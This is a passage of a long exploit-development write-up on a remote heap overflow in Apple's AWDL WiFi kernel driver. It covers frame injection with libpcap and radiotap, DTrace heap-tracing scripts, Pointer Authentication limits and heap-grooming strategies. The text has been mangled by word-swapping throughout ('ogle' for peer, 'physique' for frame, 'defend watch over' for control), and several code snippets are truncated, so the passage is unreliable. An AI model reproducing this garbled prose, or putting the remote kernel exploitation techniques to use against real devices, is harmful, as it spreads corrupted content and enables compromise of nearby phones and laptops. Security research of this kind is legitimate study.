4) Meta-grooming the zone allocator to construct a ogle object at a zone boundary so we can rotten the early bytes of an object from every other zone:

Overflowing into a clear form of object in a clear zone

We will revisit these suggestions in better factor soon.

At this point we perceive enough about the AWDL physique layout to begin attempting to catch controlled, arbitrary info going over the air and reach the physique parsing entrypoint.

I tried for a extremely lengthy time to catch the initiate source academic OWL project to manufacture and streak successfully, sadly without success. In expose to begin making growth I particular to write my have AWDL client from scratch. One more procedure can had been to write a MacOS kernel module to have interaction with the present AWDL driver, that can presumably perchance even have simplified some suggestions of the exploit nonetheless moreover made others a lot tougher.

I began off the utilization of an aged Netgear WG111v2 WiFi adapter I’ve had for a few years which I knew could presumably perchance perchance construct video display mode and physique injection, albeit only on 2.4 Ghz channels. It uses an rtl8187 chipset. Since I wished to make utilize of the linux drivers for these adapters I provided a Raspberry Pi 4B to streak the exploit.

Within the previous I’ve faded Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, nonetheless since we’ll need rather a few defend watch over over injection timing it is miles perchance no longer the most spirited instrument. Scapy uses libpcap to have interaction with the hardware to inject raw frames so I took a scrutinize at libpcap. Some googling later I figured out this very honest proper tutorial example which demonstrates precisely utilize libpcap to inject a raw 802.11 physique. Let dissect precisely what’s required:

We have considered the structure of the guidelines in 802.11 AWDL frames; there will likely be an ieee80211 header in the start, an Apple OUI, then the AWDL action physique header and so forth. If our WiFi adaptor had been connected to a WiFi network, that is at risk of be enough info to transmit this form of physique. The verbalize is that we’re no longer connected to any network. This means we favor to glue some metadata to our physique to expose the WiFi adaptor precisely the procedure it’ll aloof catch this physique on to the air. For example, what channel and with what bandwidth and modulation plot must aloof it utilize to inject the physique? Ought to aloof it strive re-transmits except an ACK is obtained? What mark energy must aloof it utilize to inject the physique?

Radiotap is a frail for expressing precisely this form of physique metadata, both when injecting frames and receiving them. It is a rather fiddly variable-sized header which that it is doubtless you’ll prepend on the entrance of a physique to be injected (or learn off the start of a physique which you have sniffed.)

Whether or no longer the radiotap fields you specify are undoubtedly revered and faded relies on the motive force you is at risk of be the utilization of – a driver can also simply grab to easily no longer enable userspace to specify many suggestions of injected frames. Right here is an example radiotap header captured from a AWDL physique the utilization of the constructed-in MacOS packet sniffer on a MacBook Expert. Wireshark has parsed the binary radiotap layout for us:

Wireshark parses radiotap headers in pcaps and shows them in a human-readable form

From this radiotap header we can scrutinize a timestamp, the guidelines price faded for transmission, the channel (5.220 GHz which is channel 44) and the modulation plot (OFDM). We can moreover scrutinize an indication of the energy of the obtained mark and a measure of the noise.

The tutorial gave the next radiotap header:

static uint8_t u8aRadiotapHeader[]={

  0x00, 0x00, // version

  0x18, 0x00, // size

  0x0f, 0x80, 0x00, 0x00, // integrated fields

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //timestamp

  0x10, // add FCS

  0x00,// price

  0x00, 0x00, 0x00, 0x00, // channel

  0x08, 0x00, // NOACK; construct no longer retry

};

With info of radiotap and a recent header it be no longer too complicated to catch an AWDL physique on to the air the utilization of the pcap_inject interface and a wireless adaptor in video display mode:

int pcap_inject(pcap_t *p, const void *buf, size_t size)

In spite of every thing, this doesn’t right away work and with some trial and mistake it looks the price and channel fields must not being revered. Injection with this adaptor looks to only work at 1Mbps, and the channel specified in the radiotap header can also simply no longer be the one faded for injection. This is rarely always this form of difficulty as we can aloof without complications put the wifi adaptor channel manually:

iw dev wlan0 put channel 6

Injection at 1Mbps is exceptionally unhurried nonetheless that is enough to catch a test AWDL physique on to the air and we can scrutinize it in Wireshark on every other instrument in video display mode. However nothing looks to be occurring on a purpose instrument. Time for some debugging!

The SEEMOO labs paper had already suggested environment some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages had been incredibly critical nonetheless customarily you’d like more info than you’re going to catch from the logs.

For the initial portray PoC I confirmed utilize the MacOS kernel debugger to change an AWDL physique which modified into about to be transmitted. Usually, in my skills, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst that it is doubtless you’ll technically script it the utilization of lldb’s python bindings, I’d no longer point out it.

Apple does have one trick up their sleeve on the opposite hand; DTrace! Where the MacOS kernel debugger is dreadful for my fragment, dtrace is phenomenal. DTrace is a dynamic tracing framework at first developed by Sun Microsystems for Solaris. It has been ported to many platforms in conjunction with MacOS and ships by default. It’s the magic wearisome instruments such as Devices. DTrace allows you to hook in minute snippets of tracing code nearly wherever you’d like, both in userspace suggestions, and, amazingly, the kernel. Dtrace has its quirks. Hooks are written in the D language which doesn’t have loops and the scoping of variables takes barely of whereas to catch your head round, nonetheless it be the final debugging and reversing instrument.

For example, I faded this dtrace script on MacOS to log at any time when a brand contemporary IO80211AWDLPeer object modified into allocated, printing it be heap take care of and MAC take care of:

self charmac;

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {

  self->mac=(char*)arg0;

}

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return

  printf(“contemporary AWDL ogle: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p”, self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1); 

}

Right here we’re increasing two hooks, one which runs at a feature entry point and the opposite which runs loyal ahead of that identical feature returns. We can utilize the self-> syntax to pass variables between the entry point and return point and DTrace makes clear that the entries and returns match up effectively.

We have to make utilize of the mangled C++ symbol in dtrace scripts; the utilization of c++filt we can scrutinize the demangled version:

$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager

IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)

The entry hook “saves” the pointer to the MAC take care of which is passed because the first argument; associating it with the present thread and stack physique. The return hook then prints out that MAC take care of alongside with the return imprint of the feature (arg1 in a return hook is the feature’s return imprint) which in this case is the take care of of the newly-allocated IO80211AWDLPeer object.

With DTrace that it is doubtless you’ll without complications prototype customized heap logging instruments. For example must you is at risk of be focused on a specific allocation size and revel in to perceive what other objects are ending up in there it is doubtless you’ll presumably perchance perchance presumably utilize one thing enjoy the next DTrace script:

/some globals with values */

BEGIN {

  target_size_min=97;

  target_size_max=128;

}

fbt:mach_kernel:kalloc_canblock:entry {

  self->size=*(uint64_t*)arg0;

}

fbt:mach_kernel:kalloc_canblock:return

/self->size>=target_size_min ||

 self->size

{

  printf(“target allocation %x=  %x”, self->size, arg1);

  stack();

}

The expression between the two /‘s lets in the hook to be conditionally completed. On this case limiting it to cases the put kalloc_canblock has been called with a size between target_size_min and target_size_max. The constructed-in stack() feature will print a stack impress, providing you with some insight into the allocations internal a specific size vary. You’ll want to to presumably perchance perchance moreover utilize ustack() to proceed that stack impress in userspace if this kernel allocation took put due to a syscall to illustrate.

DTrace can moreover safely dereference invalid addresses without kernel panicking, making it very critical for prototyping and debugging heap grooms. With some ingenuity it be moreover which that that it is doubtless you’ll recall to mind to construct things enjoy dump linked-lists and video display for the destruction of specific objects.

I’d undoubtedly point out spending a whereas finding out DTrace; when you catch your head round its esoteric programming mannequin it is doubtless you’ll presumably perchance fetch it an immensely great instrument.

Using DTrace to log stack frames I modified into ready to impress the course expert AWDL frames took by procedure of the code and resolve how a ways my coarse AWDL frames made it. Thru this direction of I figured out that there are, as a minimum on MacOS, two AWDL parsers in the kernel: the important thing one we have already considered for the period of the IO80211Family kext and a 2nd, a lot much less complicated one in the motive force for the specific chipset being faded. There had been three checks in this much less complicated parser which I modified into failing, every of which supposed my coarse AWDL frames never made it to the IO80211Family code:

Within the start, the source MAC take care of modified into being validated. MAC addresses undoubtedly dangle more than one fields: 

The first half of a MAC take care of is an OUI. The least fundamental little bit of the first byte defines whether the take care of is multicast or unicast. The 2nd bit defines whether the take care of is in the neighborhood administered or globally uncommon. 

Draw faded below CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju – SVG drawing per PNG uploaded by Person:Vtraveller. This could occasionally be figured out on Wikipedia right here

The source MAC take care of 01: 23: 45: 67: 89:ab from the libpcap example modified into an sorrowful option as it has the multicast bit put. AWDL only desires to take care of unicast addresses and rejects frames from multicast addresses. Selecting a brand contemporary MAC take care of to spoof without that bit put solved this difficulty.

The subsequent test modified into that the first two TLVs in the variable-length payload fragment of the physique ought to be a form 4 (sync parameters) then a form 6 (provider parameters.)

Ultimately the channel quantity in the sync parameters needed to compare the channel on which the physique had undoubtedly been obtained.

With these three disorders fastened I modified into indirectly ready to catch arbitrary controlled bytes to seem at the actionFrameReport capability on a faraway instrument and the next stage of the project could presumably perchance perchance open.

We have considered that AWDL uses time division multiplexing to rapidly switch between the channels faded for AWDL (customarily 6 and 44) and the channel faded by the catch entry to point the instrument is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames despatched by AWDL guests that it is doubtless you’ll calculate once they’ll be listening in the long term. The OWL project uses the linux libev library to set up out to only transmit at the upright moment when other guests will likely be listening.

There are a few complications with this procedure for our applications:

Within the start, and extremely importantly, this makes focused on complicated. AWDL action frames are (customarily) despatched to a broadcast shuttle jam MAC take care of (ff:ff:ff:ff:ff:ff.) It is a mesh network and these frames are supposed to be faded by all of the guests for building up the mesh.

Whilst exploiting every listening AWDL instrument in proximity at the identical time would be a spirited learn difficulty and form for a groovy demo video, it moreover gifts many challenges a ways initiate air the initial scope. I undoubtedly wanted a formulation to form sure that only devices I controlled would direction of the AWDL frames I despatched.

With some experimentation it turned out that everybody AWDL frames can moreover be despatched to unicast addresses and devices would aloof parse them. This gifts every other difficulty because the AWDL virtual interface’s MAC take care of is randomly generated at any time when the interface is activated. For testing on MacOS it suffices to streak:

ifconfig awdl0

to resolve the present MAC take care of. For iOS it be barely of more alive to; my chosen formulation has been to smell on the AWDL social channels and correlate mark energy with actions of the instrument to resolve its present AWDL MAC.

There could be one other well-known distinction must you ship an AWDL action physique to a unicast take care of: if the instrument is for the time being listening on that channel and receives the physique, this could perchance presumably perchance ship an ACK. This looks to be extremely critical. We are in a position to discontinue up building some rather complicated primitives the utilization of AWDL action frames, abusing the protocol to manufacture a irregular machine. Being ready to expose whether a purpose instrument undoubtedly obtained a physique or no longer capability we can take care of AWDL frames more enjoy a legitimate transport medium. For the contemporary utilization of AWDL this is rarely always well-known; nonetheless our utilization of AWDL is no longer going to be contemporary.

This ACK-sniffing mannequin could perchance be the building block for our AWDL physique injection API.

Proper for the reason that ACKs are coming over the air now doesn’t point out we undoubtedly scrutinize them. Despite the indisputable truth that the WiFi adaptor we’re the utilization of for injection ought to be technically in a position to receiving ACKs (as they are a elementary protocol building block), being ready to scrutinize them on the video display interface is rarely always guaranteed.

A screenshot of wireshark exhibiting a spoofed AWDL physique followed by an Acknowledgement from the purpose instrument.

The libpcap interface is extremely generic and doesn’t have any formulation to point to that a physique modified into ACKed or no longer. It will also no longer even be the case that the kernel driver is aware whether an ACK modified into obtained. I didn’t undoubtedly want to delve into the injection interface kernel drivers or firmware as that modified into at risk of be a first-rate funding in itself so I tried every other suggestions.

ACK frames in 802.11g and 802.11a are timing basically based. There could be a short window after every transmitted physique when the receiver can ACK in the event that they obtained the physique. It’s for this motive that ACK frames construct no longer dangle a source MAC take care of. It’s no longer well-known because the ACK is already completely correlated with a source instrument due to the timing.

If we moreover hear on our injection interface in video display mode shall we be ready to fetch the ACK frames ourself and correlate them. As talked about, no longer all chipsets and drivers undoubtedly present you with all of the management frames.

For my early prototypes, I managed to search out a pair in my field of WiFi adaptors the put one would successfully inject on 2.4ghz channels at 1Mbps and the opposite would successfully sniff ACKs on that channel at 1Mbps.

1Mbps is exceptionally unhurried; a comparatively big AWDL physique finally ends up being on the air for 10ms or more at that tempo, so if your availability window is exclusively a few ms you is at risk of be no longer going to catch many frames per 2nd. Mild, this modified into enough to catch going.

The injection framework I constructed for the exploit uses two threads, one for physique injection and one for ACK sniffing. Frames are injected the utilization of the try_inject feature, which extracts the spoofed source MAC take care of and indicators to the 2nd sniffing thread to begin attempting to fetch an ACK physique being despatched to that MAC.

Using a pthread situation variable, the injecting thread can then anticipate a restricted period of time for the period of which the sniffing thread can also simply or can also simply no longer scrutinize the ACK. If the sniffing thread does scrutinize the ACK it can perchance portray this truth then mark the situation variable. The injection thread will discontinue ready and can also test whether the ACK modified into obtained.

Opt a scrutinize at try_inject_internal in the exploit for the mutex and situation variable setup code for this.

There could be a wrapper round try_inject called inject which over and over calls try_inject except it succeeds. These two techniques enable us to construct all of the timing soft and insensitive physique injection we need.

These two techniques pick a variable series of pkt_buf_t pointers; a easy customized variable-sized buffer wrapper object. The coolest thing about this procedure is that it lets in us to rapidly prototype contemporary AWDL physique structures without needing to write boilerplate code. For example, that is all of the code required to inject a recent AWDL physique and re-transmit it except the purpose receives it:

inject(RT(),

       WIFI(dst, src),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       PKT_END());

Investing barely of little bit of time building this API saved rather a few time in the long term and made it very easy to experiment with contemporary suggestions.

With an injection framework indirectly up and working we can open to be aware of undoubtedly exploit this vulnerability!

The Apple A12 SOC explain in the iPhone Xr/Xs contained the first commercially-on hand ARM CPU implementing the ARM-8.3 no longer compulsory Pointer Authentication feature. This modified into released in September 2018. This put up from Mission Zero researcher Brandon Azad covers PAC and its implementation by Apple in big factor, as does this presentation from the 2019 LLVM builders assembly.

Its major utilize is as a form of Buy watch over Drift Integrity. In theory all feature pointers present in memory must aloof dangle a Pointer Authentication Code of their better bits that will most likely be verified after the pointer is loaded from memory nonetheless ahead of it be faded to change defend watch over drift.

In nearly all cases this PAC instrumentation will likely be added by the compiler. There could be a terribly big document from the clang personnel which fits into big factor about the implementation of PAC from a compiler point of peep and the protection tradeoffs alive to. It has an very honest proper fragment on the risk mannequin of PAC which frankly and honestly discusses the cases the put PAC can also simply attend and the cases the put it can perchance also simply no longer. Documentation enjoy this must aloof ship with every mitigation.

Having a publicly documented risk mannequin helps all people perceive the intentions wearisome fabricate choices and the tradeoffs which had been well-known. It helps manufacture a recent vocabulary and helps to switch discussions about mitigations a ways off from a specialize in safety by procedure of obscurity in direction of a qualitative appraisal of their strengths and weaknesses.

Concretely, the first hurdle PAC will throw up is that this could perchance presumably perchance form it tougher to forge vtable pointers.

All OSObject-derived objects have virtual techniques. IO80211AWDLPeer, enjoy nearly all IOKit C++ lessons derives from OSObject so the first discipline is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can without complications prevail in defend watch over of a vtable pointer. This formulation modified into faded in Mateusz Jurczyk‘s Samsung MMS faraway exploit and Natalie Silvanovich‘s faraway WebRTC exploit this yr.

Kernel virtual calls have gone from wanting enjoy this on A11 and below:

LDR   X8, [X20]      ; load vtable pointer

LDR   X8, [X8,#0x38] ; load feature pointer from vtable

MOV   X0, X20

BLR   X8             ; call virtual feature

to this on A12 and above:

LDR   X8, [X20]           ; load vtable pointer

; authenticate vtable pointer the utilization of A-household info key and nil context

; if authentication passes, add 0x38 to vtable pointer, load imprint

; at that take care of into X9 and store X8+0x38 support to X8 with no PAC

LDRAA X9, [X8,#0x38]!

; overwrite the simpler 16 bits of X8 with the constant 0xFFFC

; that is a hash of the mangled symbol; constant at every callsite

MOVK  X8, #0xFFFC,LSL#48

MOV   X0, X20

; authenticate virtual feature pointer with A-household instruction key

; and context imprint the put the simpler 16 bits are a hash of the

; virtual feature prototype and the lower 48 bits are the runtime

; take care of of the virtual feature pointer in the vtable

BLRAA X9, X8

Diagrammatic peep of a C++ virtual call in ARM64e exhibiting the keys and discriminators faded

What does that point out in put collectively?

If we construct no longer have a signing system, then we can no longer trivially point a vtable pointer to an arbitrary take care of. Although shall we, we would want a info and instruction household signing system with defend watch over over the discriminator.

We can swap a vtable pointer with any other A-household 0-context info key signed pointer, on the opposite hand the virtual feature pointer itself is signed with a context imprint consisting of the take care of of the vtable entry and a hash of the virtual feature prototype. This means we can no longer swap virtual feature pointers from one vtable into every other one (or more likely into a coarse vtable to which we’re ready to catch an A-household info key signed pointer.)

We can swap one vtable pointer for every other one to reason a form confusion, on the opposite hand every virtual feature call made by procedure of that vtable pointer would must aloof be calling a feature with a matching prototype hash. This is rarely always so not doubtless; a elementary building block of object-oriented programming in C++ is to call suggestions with matching prototypes nonetheless various behaviour through a vtable. Alternatively you’d have to construct some bearing in mind to reach up with a generic defeat the utilization of this procedure.

Essentially the most well-known observation is that the vtable pointers themselves haven’t any take care of vary; they’re signed with a 0-context. This implies that if we can expose a signed vtable pointer for an object of form A at take care of X, we can overwrite the vtable pointer for every other object of form A at a clear take care of Y.

This can also seem entirely trivial and tiresome nonetheless consider: we only have a linear heap buffer overflow. If the vtable pointer had take care of vary then for us to be ready to securely rotten fields after the vtable in an adjoining object we must first expose the particular vtable pointer following the object which we can overflow out of. As a replacement we can expose any vtable pointer for this form and that’s at risk of be expert.

The clang fabricate doc explains why that is:

It’s moreover identified that some code in put collectively copies objects containing v-tables with memcpy, and whereas that is no longer approved formally, it is miles one thing that will most likely be invasive to set away with.

Appropriate at the discontinue of this document they moreover mutter “attackers is at risk of be devious.” On A12 and above we can no longer trivially point the vtable pointer to a coarse vtable and prevail in arbitrary PC defend watch over rather without complications. Bet we’ll have to catch devious 🙂

Before every thing I persisted the utilization of the iOS 12 beta 1 kernelcache when attempting to fetch exploitation primitives and performing the initial reversing to better perceive the layout of the IO80211AWDLPeer object. This turned out to be a first-rate mistake and a few weeks had been spent following unproductive leads:

Within the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer gave the influence tiresome, as a minimum from the standpoint of being ready to manufacture a stronger frail from the linear overflow. For this motive my initial suggestions checked out corrupting the fields at the starting of an IO80211AWDLPeer object which I could presumably perchance perchance put subsequently in memory, probability 2 which we saw earlier:

Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects rather easy. The synctree buffer overflow then lets in corrupting the lower fields of an IO80211AWDLPeer moreover to the simpler fields

Nearly with no doubt we’ll need some roughly memory disclosure frail to land this exploit. My first suggestions for building a memory disclosure frail alive to corrupting the linked-list of guests. The suggestions structure holding the guests is undoubtedly procedure more complicated than a linked list, it be more enjoy a priority queue with some spirited behaviours when the queue is modified and a clear lack of stable unlinking and the enjoy. I’d rely on iOS to begin slowly migrating to the utilization of information-PAC for linked-list integrity, nonetheless for now that is no longer the case. Of direction these linked lists construct no longer even have the most contemporary stable-unlinking integrity checks but.

The beginning of an IO80211AWDLPeer object looks enjoy this:

All IOKit objects inheriting from OSObject have a vtable and a reference depend as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the ogle’s MAC take care of and the ogle’s peer_manager pointer.

My first suggestions revolved round attempting to partially rotten a ogle linked-list pointer. In hindsight, there could be an evident motive this doesn’t work (which I will discuss in barely), nonetheless let’s remain though-provoking and proceed on for now…

Having a scrutinize by procedure of the areas the put the linked list of guests looked as if it can presumably perchance perchance be faded it looked enjoy presumably the IO80211AWDLPeerManager::updatePeerListBloomFilter capability is at risk of be spirited from the standpoint of attempting to catch info leaked support to us. Let’s pick a scrutinize at it:

IO80211AWDLPeerManager::updatePeerListBloomFilter(){

  int n_peers=this->peers_list.n_elems;

  if (!this->peer_bloom_filters_enabled) {

    return 0;

  }

  bzero(this->bloom_filter_buf, 0xA00uLL);

  this->n_macs_in_bloom_filter=0;

  IO80211AWDLPeerogle=this->peers_list.head;

  int n_peers_in_filter=0;

  for (;

       n_peers_in_filter

       n_peers_in_filter++) {

    this->bloom_filter_macs[n_peers_in_filter]=ogle.mac;

    ogle=ogle->flink;

  }

  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,

                      0,

                      n_peers_in_filter,

                      this->bloom_filter_macs,

                      this->bloom_filter_buf);

  if (n_peers_in_filter){

    this->updateBroadcastMI(9, 1, 0);
  }

  return 0;

}

From the IO80211AWDLPeerManager it be reading the ogle list head pointer as effectively as a depend of the series of entries in the ogle list. For every entry in the list it be reading the MAC take care of discipline into an array then builds a bloom filter from that buffer. 

The spirited section right here is that the list traversal is terminated the utilization of a depend of ingredients which had been traversed rather then by attempting to fetch a termination pointer imprint at the discontinue of the list (eg a NULL or a pointer support to the head factor.) This implies that potentially if shall we rotten the linked-list pointer of the 2nd-to-closing ogle to be processed shall we point it to a coarse ogle and catch info at a controlled take care of added into the bloom filter. updateBroadcastMI looks enjoy this could perchance presumably perchance add that bloom filter info to the Grasp Indication physique in the bloom filter TLV, that means shall we catch a bloom filter containing info learn from a controlled take care of despatched support to us. Relying on the particular layout of the bloom filter it can presumably perchance perchance doubtlessly be which that that it is doubtless you’ll recall to mind to then recover as a minimum some bits of faraway memory.

It’s well-known to emphasize at this point that due to the inability of a faraway KASLR leak and moreover the inability of a faraway PAC signing system or vtable disclosure, in expose to rotten the linked-list pointer of an adjoining ogle object we haven’t got any probability nonetheless to rotten its vtable pointer with an invalid imprint. This implies that if any virtual techniques had been called on this object, it can presumably perchance perchance nearly with no doubt reason a kernel terror.

The first section of attempting to catch this to work modified into to work out manufacture a reliable heap groom such that shall we overflow from a ogle into the 2nd-to-closing ogle in the list which would be processed

Every the linked-list expose and the virtual memory expose must aloof be groomed to enable a centered partial overflow of the final linked-list pointer to be traversed. On this layout we would favor to overflow from 2 into 6 to rotten the final pointer from 6 to 7.

There could be a mitigation from a few years previously in play right here which we’ll have to work round; particularly the randomization of the initial zone freelists which adds a cramped factor of randomness to the expose of the allocations you’re going to catch for consecutive calls to kalloc for the identical size. The randomness is extremely minimal on the opposite hand so the trick right here is to be ready to pad your allocations with “stable” objects such that even must that it is doubtless you’ll no longer guarantee that you largely overflow into the purpose object, that it is doubtless you’ll largely guarantee that you’re going to overflow into that object or a stable object.

We need two primitives: Within the start, we favor to imprint the semantics of the list. Secondly, we need some stable objects.

With barely of reversing we can resolve that the code which adds guests to the list doesn’t simply add them to the start. Peers that are first considered on a 2.4GHz channel (6) construct catch added this form, nonetheless guests first considered on a 5GHz channel (44) are inserted per their RSSI (obtained mark energy indication – a unitless imprint approximating mark energy.) Stronger indicators point out the ogle is at risk of be bodily closer to the instrument and can moreover be closer to the start of the list. This provides some effective primitives for manipulating the list and guaranteeing we know the put guests will discontinue up.

The 2nd requirement is to be ready to allocate arbitrary, stable objects. Our ideal heap grooming/shaping objects would have the next primitives:

1) arbitrary size

2) unlimited allocation quantity

3) allocation has no facet effects

4) controlled contents

5) contents is at risk of be safely corrupted

6) is at risk of be free’d at an arbitrary, controlled point, with no facet effects

In spite of every thing, we’re entirely restricted to objects we can power to be allocated remotely through AWDL so all of the tricks from local kernel exploitation construct no longer work. For example, I and others have faded diversified forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to manufacture these primitives. None of these are going to work the least bit. AWDL is sufficiently complicated on the opposite hand that after some reversing I figured out a pretty proper candidate object.

Right here is my reverse-engineered definition of the products and providers response descriptor TLV (form 2):

{ u8  form

  u16 len

  u16 key_len

  u8  key_val[key_len]

  u16 value_total_size

  u16 fragment_offset

  u8  fragment[len-key_len-6] }

It has two variable-sized fields: key_val and fragment. The key_length discipline defines the length of the key_val buffer, and the length of fragment is the closing location left at the discontinue of the TLV. The parser for this TLV makes a kalloc allocation of val_length, an arbitrary u16. It then memcpy‘s from fragment into that kalloc buffer at offset frag_offset:

The service_response formulation provides us an inconceivable heap grooming frail

I factor in that is supposed to be enhance for receiving out-of-expose fragments of provider demand responses. It provides us a extremely great frail for heap grooming. We can grab an arbitrary allocation size up to 64k and write an arbitrary quantity of controlled info to an arbitrary offset in that allocation and we only favor to present the offset and relate bytes.

This moreover provides us a roughly amplification frail. We can bundle rather all these TLVs in one physique permitting us to form megabytes of controlled heap allocations with minimal facet effects in precisely one AWDL physique.

This SRD formulation undoubtedly nearly entirely meets criteria 1-5 outlined above. It’s nearly supreme instead of one well-known point; how can we free these allocations?

Thru static reversing I could presumably perchance perchance not fetch how these allocations would be free’d, so I wrote a dtrace script to attend me fetch when these proper kalloc allocations had been free’d. Operating this dtrace script then working a test AWDL client sending SRDs I saw the allocation nonetheless never the free. Even disabling the AWDL interface, which must aloof pleasing up many of the effectively-known AWDL pronounce, doesn’t reason the allocation to be freed.

Right here is presumably a trojan horse in my dtrace script, nonetheless there could be every other theory: I wrote every other test client which allocated a giant series of SRDs. This allocated a appreciable quantity of memory, enough to be considered the utilization of zprint. And certainly, working that test client over and over then working zprint that it is doubtless you’ll survey the inuse depend of the purpose zone getting better and better. Disabling AWDL doesn’t attend, neither does ready in a single day. This looks enjoy a pretty trivial memory leak.

In a while we’ll stare the motive wearisome this memory leak nonetheless for now we have a heap allocation frail which meets criteria 1-5, that’s doubtlessly proper enough!

I managed to manufacture a heap groom which gets the linked-list and heap objects put up such that I will overflow into the 2nd-to-closing ogle object to be processed:

By surrounding ogle objects with a enough series of stable objects we can form sure that the linear corruption both hits the upright ogle object or a stable object

The trick is to form sure that the ratio of stable objects to guests is sufficiently excessive that you is at risk of be (fairly) clear that the two purpose guests will only be subsequent to 1 every other or subsequent to stable objects (they would perchance presumably also simply no longer be subsequent to other guests in the list.) Even supposing that it is doubtless you’ll also simply no longer be ready to power the two guests to be in the upright expose as shown in the map, that it is doubtless you’ll as a minimum form the corruption stable in the event that they construct no longer appear to be, then strive again.

When writing the code to manufacture the SyncTree TLV I realized I’d made a giant oversight…

My initial thought had been to only partially overwrite a qualified linked-list pointer factor:

If shall we partially overflow the peer_list_flink pointer shall we potentially switch it to point it somewhere nearby. On this illustration by appealing it down by 8 bytes shall we potentially catch some bytes of a peer_list_blink added to the ogle MACs bloom filter. A partial overwrite doesn’t straight give a relative add or subtract frail, nonetheless with some heap grooming overwriting the lower 2 bytes can yield one thing identical

However must you undoubtedly scrutinize more closely at the memory layout taking into memoir the limitations of the corruption frail:

Computing the relative offsets between two IO80211AWDLPeers subsequent to 1 every other in memory it looks that a critical partial overwrite of peer_list_flink is rarely always which that that it is doubtless you’ll recall to mind as it lies on a 6-byte boundary from the lower ogle’s sync_tree_macs array

Right here is no longer a critical form of partial overwrite and it took rather a few effort to form this heap groom work only to treasure in hindsight this evident oversight.

Attempting to salvage one thing from all this work I tried as an different to loyal entirely overwrite the linked-list pointer. We could presumably perchance perchance aloof need every other vulnerability or strategy to resolve what we must always aloof overwrite with nonetheless it can presumably perchance perchance as a minimum be some growth to scrutinize a learn or write from a controlled take care of.

Alas, whereas I’m ready to construct the overflow, it looks that the linked-list of guests is being continuously traversed in the background even when there could be no AWDL traffic and virtual techniques are being called on every ogle. It will form things a glorious deal tougher without first appealing a vtable pointer.

One more option would be to trigger the SyncTree overflow twice for the period of the parsing of a single physique. Take the code in actionFrameReport

IO80211AWDLPeer::actionFrameReport

      case 0x14:

        if (tlv_cnt[0x14]>=2)

          goto ERR;

        tlv_cnt[0x14]++;

        this->parseAwdlSyncTreeTLV(bytes);

I explored areas the put a TLV would trigger a ogle list traversal. The premise would then be to sandwich a controlled look up between two SyncTree TLVs, the first to rotten the list and the 2nd to in some way form that stable. There had been some code paths enjoy this, the put shall we reason a controlled ogle to be looked up in the ogle list. There had been even some areas the put shall we potentially catch a clear memory corruption frail from this nonetheless they looked even trickier to utilize. And even then you no doubt’d no longer be ready to reset the ogle list pointer with the 2nd overflow anyway.

To this point none of my suggestions for a learn panned out; messing with the linked list with no accurately PAC’d vtable pointer loyal doesn’t seem doubtless. At this point I’d doubtlessly pick into memoir attempting to fetch a 2nd vulnerability. For example, in Natalie’s present WebRTC exploit she modified into ready to fetch a 2nd vulnerability to defeat ASLR.

There are aloof every other suggestions left initiate nonetheless they seem complicated to catch upright:

The opposite major form of object in the kalloc.6144 zone are ipc_kmsg‘s for some IOKit techniques. These are in-flight mach messages and it is miles at risk of be which that that it is doubtless you’ll recall to mind to rotten them such that shall we inject arbitrary mach messages into userspace. This thought looks largely to manufacture contemporary challenges rather then solve any initiate ones though.

If we construct no longer purpose the identical zone then shall we strive a inferior-zone attack, nonetheless even then we’re rather restricted by the primitives provided by AWDL. There loyal must not that many spirited objects we can allocate and manipulate.

By this point I’ve invested rather a few time into this project and am no longer though-provoking to quit. I’ve moreover been hearing very faint whispers that I will also simply need unintentionally stumbled upon an attack surface which is being actively exploited. Time to set up out one other thing…

Up except this point I’d been doing most of my reversing the utilization of the partially symbolized iOS 12 beta 1 kernelcache. I had carried out a appreciable quantity of reversing engineering to manufacture up an realistic thought of all of the fields in the IO80211AWDLPeer object which I could presumably perchance perchance rotten and it wasn’t wanting promising. However this vulnerability modified into only going to catch patched in iOS 13.3.1.

Can they’ve added contemporary fields in iOS 13? It gave the influence no longer going nonetheless needless to claim price a scrutinize.

Right here is my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:

struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {

/+0x0000 */  void *vtable;

/+0x0008 */  uint32_t ref_cnt;

/+0x000C */  uint32_t bucket;

/+0x0010 */  void *peer_list_flink;

/+0x0018 */  void *peer_list_blink;

/+0x0020 */  struct ether_addr peer_mac;

/+0x0026 */  uint8_t pad1[2];

/+0x0028 */  struct IO80211AWDLPeerManager *peer_manager;

/+0x0030 */  uint8_t pad8[384];

/+0x01B0 */  uint16_t HT_FLAGS;

/+0x01B2 */  uint8_t HT_features[26];

/+0x01CC */  uint8_t HT_caps;

/+0x01CD */  uint8_t pad10[14];

/+0x01DB */  uint8_t VHT_caps;

/+0x01DC */  uint8_t pad9[732];

/+0x0418 */  uint8_t added_to_fw_cache;

/+0x04B9 */  uint8_t is_on_correct_infra_channel;

/+0x04BA */  uint8_t pad0[6];

/+0x04C0 */  uint32_t nsync_total_len;

/+0x0404 */  uint8_t nsync_tlv_buf[64];

/+0x0504 */  uint32_t flags_from_dp_tlv;

/+0x0508 */  uint8_t pad14[19];

